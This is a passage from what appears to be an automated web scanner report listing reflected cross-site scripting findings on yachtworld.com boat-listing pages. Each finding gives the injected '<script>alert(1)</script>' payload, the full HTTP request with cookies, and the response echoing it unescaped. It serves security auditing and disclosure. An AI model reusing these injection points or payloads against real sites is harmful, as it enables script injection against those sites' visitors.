savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:49 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 20 Jan 2011 19:08:49 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2203131%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B188%2C900%5B%25%5DPort+Clinton%2C+OH%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F0%2F3%2F1%2F2203131_13_mini.jpg%3F1282073289000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2203131%2FPort-Clinton%2FOH%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:49 GMT
Set-Cookie: VIEWED_BOATS_STORE=2203131%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B188%2C900%5B%25%5DPort+Clinton%2C+OH%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F0%2F3%2F1%2F2203131_13_mini.jpg%3F1282073289000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2203131%2FPort-Clinton%2FOH%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2203131&boat_id=2203131&back=/core/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States52069"><script>alert(1)</script>deba5c42268&boat_id=2203131">
...[SNIP]...

3.164. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8b36"><script>alert(1)</script>7cb42153422 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States?b8b36"><script>alert(1)</script>7cb42153422=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:45 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 20 Jan 2011 19:08:49 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2203131%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B188%2C900%5B%25%5DPort+Clinton%2C+OH%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F0%2F3%2F1%2F2203131_13_mini.jpg%3F1282073289000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2203131%2FPort-Clinton%2FOH%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:44 GMT
Set-Cookie: VIEWED_BOATS_STORE=2203131%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B188%2C900%5B%25%5DPort+Clinton%2C+OH%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F0%2F3%2F1%2F2203131_13_mini.jpg%3F1282073289000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2203131%2FPort-Clinton%2FOH%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&b8b36"><script>alert(1)</script>7cb42153422=1&currency=USD&units=Feet&seo=0&checked_boats=2203131&boat_id=2203131&back=/core/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States&boat_id=2203131">
...[SNIP]...

3.165. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66639"><script>alert(1)</script>97f8e09c392 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2008/Regulator-32-Fs-2272100/Hampton66639"><script>alert(1)</script>97f8e09c392/VA/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:07 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 18 Nov 2010 20:30:49 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2272100%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B169%2C000%5B%25%5DHampton%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F2%2F1%2F2272100_1_mini.jpg%3F1286375575000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2272100%2FHampton%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:06 GMT
Set-Cookie: VIEWED_BOATS_STORE=2272100%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B169%2C000%5B%25%5DHampton%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F2%2F1%2F2272100_1_mini.jpg%3F1286375575000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2272100%2FHampton%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2272100&boat_id=2272100&back=/core/boats/2008/Regulator-32-Fs-2272100/Hampton66639"><script>alert(1)</script>97f8e09c392/VA/United-States&boat_id=2272100">
...[SNIP]...

3.166. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23553"><script>alert(1)</script>dd7c4f7507a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2008/Regulator-32-Fs-2272100/Hampton/VA23553"><script>alert(1)</script>dd7c4f7507a/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
